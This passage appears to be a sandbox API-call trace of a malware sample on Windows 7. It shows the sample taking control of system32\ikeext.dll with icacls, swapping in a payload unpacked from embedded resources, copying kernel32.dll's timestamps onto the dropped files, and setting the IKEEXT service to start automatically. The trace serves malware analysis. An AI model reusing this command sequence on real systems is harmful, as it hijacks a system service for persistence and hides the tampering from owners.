hStdError=0x0), lpProcessInformation=0x14e6b8 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant administrators:F\"", lpProcessInformation=0x14e6b8*(hProcess=0x70, hThread=0x74, dwProcessId=0xbe0, dwThreadId=0xbe4)) returned 1 [0048.257] WaitForSingleObject (hHandle=0x70, dwMilliseconds=0xffffffff) returned 0x0 [0048.381] CloseHandle (hObject=0x70) returned 1 [0048.381] CloseHandle (hObject=0x74) returned 1 [0048.381] GetVersionExA (in: lpVersionInformation=0x14ef80*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14ef80*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0048.381] PathFileExistsA (pszPath="C:\\Windows\\system32\\ikeext32.dll") returned 0 [0048.382] MoveFileA (lpExistingFileName="C:\\Windows\\system32\\ikeext.dll" (normalized: "c:\\windows\\system32\\ikeext.dll"), lpNewFileName="C:\\Windows\\system32\\ikeext32.dll" (normalized: "c:\\windows\\system32\\ikeext32.dll")) returned 1 [0048.382] DeleteFileA (lpFileName="C:\\Windows\\system32\\ikeext.dll" (normalized: "c:\\windows\\system32\\ikeext.dll")) returned 0 [0048.382] GetNativeSystemInfo (in: lpSystemInfo=0x14eff8 | out: lpSystemInfo=0x14eff8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0048.382] FindResourceA (hModule=0x5ef10000, lpName=0x6c, lpType="jpg") returned 0x5ef370e0 [0048.383] LoadResource (hModule=0x5ef10000, hResInfo=0x5ef370e0) returned 0x5ef37140 [0048.383] SizeofResource (hModule=0x5ef10000, hResInfo=0x5ef370e0) returned 0x185b7 [0048.383] LockResource (hResData=0x5ef37140) returned 0x5ef37140 [0048.387] DeleteFileA (lpFileName="C:\\Windows\\system32\\sensr3.dat" (normalized: "c:\\windows\\system32\\sensr3.dat")) returned 0 [0048.387] CreateFileA (lpFileName="C:\\Windows\\system32\\sensr3.dat" (normalized: "c:\\windows\\system32\\sensr3.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0048.387] WriteFile (in: hFile=0x74, lpBuffer=0x289718*, nNumberOfBytesToWrite=0x185b7, lpNumberOfBytesWritten=0x14f00c, lpOverlapped=0x0 | out: lpBuffer=0x289718*, lpNumberOfBytesWritten=0x14f00c*=0x185b7, lpOverlapped=0x0) returned 1 [0048.389] CloseHandle (hObject=0x74) returned 1 [0048.398] FreeResource (hResData=0x5ef37140) returned 0 [0048.398] FindResourceA (hModule=0x5ef10000, lpName=0x6d, lpType="jpg") returned 0x5ef370f0 [0048.398] LoadResource (hModule=0x5ef10000, hResInfo=0x5ef370f0) returned 0x5ef4f6f8 [0048.398] SizeofResource (hModule=0x5ef10000, hResInfo=0x5ef370f0) returned 0x137a3 [0048.398] LockResource (hResData=0x5ef4f6f8) returned 0x5ef4f6f8 [0048.401] DeleteFileA (lpFileName="C:\\Windows\\system32\\ikeext.dll" (normalized: "c:\\windows\\system32\\ikeext.dll")) returned 0 [0048.406] CreateFileA (lpFileName="C:\\Windows\\system32\\ikeext.dll" (normalized: "c:\\windows\\system32\\ikeext.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0048.407] WriteFile (in: hFile=0x74, lpBuffer=0x29cec8*, nNumberOfBytesToWrite=0x21200, lpNumberOfBytesWritten=0x14f00c, lpOverlapped=0x0 | out: lpBuffer=0x29cec8*, lpNumberOfBytesWritten=0x14f00c*=0x21200, lpOverlapped=0x0) returned 1 [0048.411] CloseHandle (hObject=0x74) returned 1 [0048.413] FreeResource (hResData=0x5ef4f6f8) returned 0 [0048.413] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x74 [0048.413] GetFileTime (in: hFile=0x74, lpCreationTime=0x14f004, lpLastAccessTime=0x14f00c, lpLastWriteTime=0x14f014 | out: lpCreationTime=0x14f004*(dwLowDateTime=0xfd149700, dwHighDateTime=0x1d2f5d2), lpLastAccessTime=0x14f00c*(dwLowDateTime=0xfd149700, dwHighDateTime=0x1d2f5d2), lpLastWriteTime=0x14f014*(dwLowDateTime=0x69b5f800, dwHighDateTime=0x1cb889c)) returned 1 [0048.413] CreateFileA (lpFileName="C:\\Windows\\system32\\sensr3.dat" (normalized: "c:\\windows\\system32\\sensr3.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x70 [0048.413] SetFileTime (hFile=0x70, lpCreationTime=0x14f004, lpLastAccessTime=0x14f00c, lpLastWriteTime=0x14f014) returned 1 [0048.413] CloseHandle (hObject=0x74) returned 1 [0048.413] CloseHandle (hObject=0x70) returned 1 [0048.413] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x70 [0048.414] GetFileTime (in: hFile=0x70, lpCreationTime=0x14f004, lpLastAccessTime=0x14f00c, lpLastWriteTime=0x14f014 | out: lpCreationTime=0x14f004*(dwLowDateTime=0xfd149700, dwHighDateTime=0x1d2f5d2), lpLastAccessTime=0x14f00c*(dwLowDateTime=0xfd149700, dwHighDateTime=0x1d2f5d2), lpLastWriteTime=0x14f014*(dwLowDateTime=0x69b5f800, dwHighDateTime=0x1cb889c)) returned 1 [0048.414] CreateFileA (lpFileName="C:\\Windows\\system32\\ikeext.dll" (normalized: "c:\\windows\\system32\\ikeext.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x74 [0048.414] SetFileTime (hFile=0x74, lpCreationTime=0x14f004, lpLastAccessTime=0x14f00c, lpLastWriteTime=0x14f014) returned 1 [0048.414] CloseHandle (hObject=0x70) returned 1 [0048.414] CloseHandle (hObject=0x74) returned 1 [0048.414] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x74 [0048.414] GetFileTime (in: hFile=0x74, lpCreationTime=0x14f004, lpLastAccessTime=0x14f00c, lpLastWriteTime=0x14f014 | out: lpCreationTime=0x14f004*(dwLowDateTime=0xfd149700, dwHighDateTime=0x1d2f5d2), lpLastAccessTime=0x14f00c*(dwLowDateTime=0xfd149700, dwHighDateTime=0x1d2f5d2), lpLastWriteTime=0x14f014*(dwLowDateTime=0x69b5f800, dwHighDateTime=0x1cb889c)) returned 1 [0048.414] CreateFileA (lpFileName="C:\\Windows\\system32\\sensr9.dat" (normalized: "c:\\windows\\system32\\sensr9.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x70 [0048.414] SetFileTime (hFile=0x70, lpCreationTime=0x14f004, lpLastAccessTime=0x14f00c, lpLastWriteTime=0x14f014) returned 1 [0048.414] CloseHandle (hObject=0x74) returned 1 [0048.414] CloseHandle (hObject=0x70) returned 1 [0048.414] GetLastError () returned 0x0 [0048.414] SetLastError (dwErrCode=0x0) [0048.415] GetSystemDirectoryA (in: lpBuffer=0x14ef10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.415] GetLastError () returned 0x0 [0048.415] SetLastError (dwErrCode=0x0) [0048.415] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"sc config ikeext start= auto\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x14e6c8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14e6b8 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"sc config ikeext start= auto\"", lpProcessInformation=0x14e6b8*(hProcess=0x74, hThread=0x70, dwProcessId=0xc00, dwThreadId=0xc04)) returned 1 [0048.421] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0048.637] CloseHandle (hObject=0x74) returned 1 [0048.637] CloseHandle (hObject=0x70) returned 1 [0048.637] GetLastError () returned 0x0 [0048.637] SetLastError (dwErrCode=0x0) [0048.637] GetSystemDirectoryA (in: lpBuffer=0x14ef10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.637] GetLastError () returned 0x0 [0048.637] SetLastError (dwErrCode=0x0) [0048.637] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"net start ikeext\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x14e6c8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14e6b8 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"net start ikeext\"", lpProcessInformation=0x14e6b8*(hProcess=0x74, hThread=0x70, dwProcessId=0xc20, dwThreadId=0xc24)) returned 1 [0048.640] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0050.878] CloseHandle (hObject=0x74) returned 1 [0050.878] CloseHandle (hObject=0x70) returned 1 [0050.879] GetNativeSystemInfo (in: lpSystemInfo=0x14eff8 | out: lpSystemInfo=0x14eff8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0050.880] RtlInterlockedFlushSList (in: ListHead=0x5ef33f50 | out: ListHead=0x5ef33f50) returned 0x0 [0050.880] GetProcAddress (hModule=0x76590000, lpProcName="FlsFree") returned 0x765e1f61 [0050.880] GetProcAddress (hModule=0x76590000, lpProcName="FlsFree") returned 0x765e1f61 [0050.882] FreeLibrary (hLibModule=0x76590000) returned 1 [0050.882] FreeLibrary (hLibModule=0x76590000) returned 1 Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7eef7720" os_pid = "0xb7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xb74" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"net stop /y ikeext\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 911 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 912 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 913 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 914 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 915 start_va = 0x49e50000 end_va = 0x49e9bfff entry_point = 0x49e5829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 916 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 917 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 918 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 919 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 920 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 921 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 922 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 923 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 924 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 925 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 926 start_va = 0x721b0000 end_va = 0x721b6fff entry_point = 0x721b1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 927 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 928 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 929 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 930 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 931 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 932 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 933 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 934 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 935 start_va = 0x420000 end_va = 0x4e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 936 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 937 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 938 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 939 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 940 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 941 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 942 start_va = 0x5d0000 end_va = 0x6d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 943 start_va = 0x6e0000 end_va = 0x12dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 944 start_va = 0x12e0000 end_va = 0x1442fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012e0000" filename = "" Region: id = 945 start_va = 0x1450000 end_va = 0x171efff entry_point = 0x1450000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 40 os_tid = 0xb80 [0047.283] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fc14 | out: lpSystemTimeAsFileTime=0x26fc14*(dwLowDateTime=0x4d81fd00, dwHighDateTime=0x1d34280)) [0047.283] GetCurrentProcessId () returned 0xb7c [0047.283] GetCurrentThreadId () returned 0xb80 [0047.283] GetTickCount () returned 0x13a51 [0047.283] QueryPerformanceCounter (in: lpPerformanceCount=0x26fc0c | out: lpPerformanceCount=0x26fc0c*=313677940) returned 1 [0047.284] GetModuleHandleA (lpModuleName=0x0) returned 0x49e50000 [0047.284] __set_app_type (_Type=0x1) [0047.284] __p__fmode () returned 0x768231f4 [0047.284] __p__commode () returned 0x768231fc [0047.284] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e721a6) returned 0x0 [0047.284] __getmainargs (in: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c, _DoWildCard=0, _StartInfo=0x49e74140 | out: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c) returned 0 [0047.285] GetCurrentThreadId () returned 0xb80 [0047.285] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb80) returned 0x38 [0047.285] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0047.285] GetProcAddress (hModule=0x76590000, lpProcName="SetThreadUILanguage") returned 0x765e24c2 [0047.285] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.285] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0047.285] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fba4 | out: phkResult=0x26fba4*=0x0) returned 0x2 [0047.285] VirtualQuery (in: lpAddress=0x26fbdb, lpBuffer=0x26fb74, dwLength=0x1c | out: lpBuffer=0x26fb74*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0047.285] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fb74, dwLength=0x1c | out: lpBuffer=0x26fb74*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0047.285] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fb74, dwLength=0x1c | out: lpBuffer=0x26fb74*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0047.285] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fb74, dwLength=0x1c | out: lpBuffer=0x26fb74*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0047.285] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fb74, dwLength=0x1c | out: lpBuffer=0x26fb74*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0047.285] GetConsoleOutputCP () returned 0x1b5 [0047.285] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0047.285] SetConsoleCtrlHandler (HandlerRoutine=0x49e6e72a, Add=1) returned 1 [0047.285] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.285] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0047.286] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.286] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0047.286] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.286] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0047.286] _get_osfhandle (_FileHandle=0) returned 0x3 [0047.286] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0047.286] _get_osfhandle (_FileHandle=0) returned 0x3 [0047.286] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0047.286] GetEnvironmentStringsW () returned 0x3300c8* [0047.286] FreeEnvironmentStringsW (penv=0x3300c8) returned 1 [0047.286] GetEnvironmentStringsW () returned 0x3300c8* [0047.286] FreeEnvironmentStringsW (penv=0x3300c8) returned 1 [0047.287] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eb14 | out: phkResult=0x26eb14*=0x40) returned 0x0 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x0, lpData=0x26eb20*=0xc0, lpcbData=0x26eb18*=0x1000) returned 0x2 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x4, lpData=0x26eb20*=0x1, lpcbData=0x26eb18*=0x4) returned 0x0 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x0, lpData=0x26eb20*=0x1, lpcbData=0x26eb18*=0x1000) returned 0x2 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x4, lpData=0x26eb20*=0x0, lpcbData=0x26eb18*=0x4) returned 0x0 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x4, lpData=0x26eb20*=0x40, lpcbData=0x26eb18*=0x4) returned 0x0 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x4, lpData=0x26eb20*=0x40, lpcbData=0x26eb18*=0x4) returned 0x0 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x0, lpData=0x26eb20*=0x40, lpcbData=0x26eb18*=0x1000) returned 0x2 [0047.287] RegCloseKey (hKey=0x40) returned 0x0 [0047.287] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eb14 | out: phkResult=0x26eb14*=0x40) returned 0x0 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x0, lpData=0x26eb20*=0x40, lpcbData=0x26eb18*=0x1000) returned 0x2 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x4, lpData=0x26eb20*=0x1, lpcbData=0x26eb18*=0x4) returned 0x0 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x0, lpData=0x26eb20*=0x1, lpcbData=0x26eb18*=0x1000) returned 0x2 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x4, lpData=0x26eb20*=0x0, lpcbData=0x26eb18*=0x4) returned 0x0 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x4, lpData=0x26eb20*=0x9, lpcbData=0x26eb18*=0x4) returned 0x0 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x4, lpData=0x26eb20*=0x9, lpcbData=0x26eb18*=0x4) returned 0x0 [0047.287] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eb1c, lpData=0x26eb20, lpcbData=0x26eb18*=0x1000 | out: lpType=0x26eb1c*=0x0, lpData=0x26eb20*=0x9, lpcbData=0x26eb18*=0x1000) returned 0x2 [0047.287] RegCloseKey (hKey=0x40) returned 0x0 [0047.287] time (in: timer=0x0 | out: timer=0x0) returned 0x59ddfa0e [0047.287] srand (_Seed=0x59ddfa0e) [0047.287] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"net stop /y ikeext\"" [0047.287] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"net stop /y ikeext\"" [0047.287] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.288] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x331918, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0047.288] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: 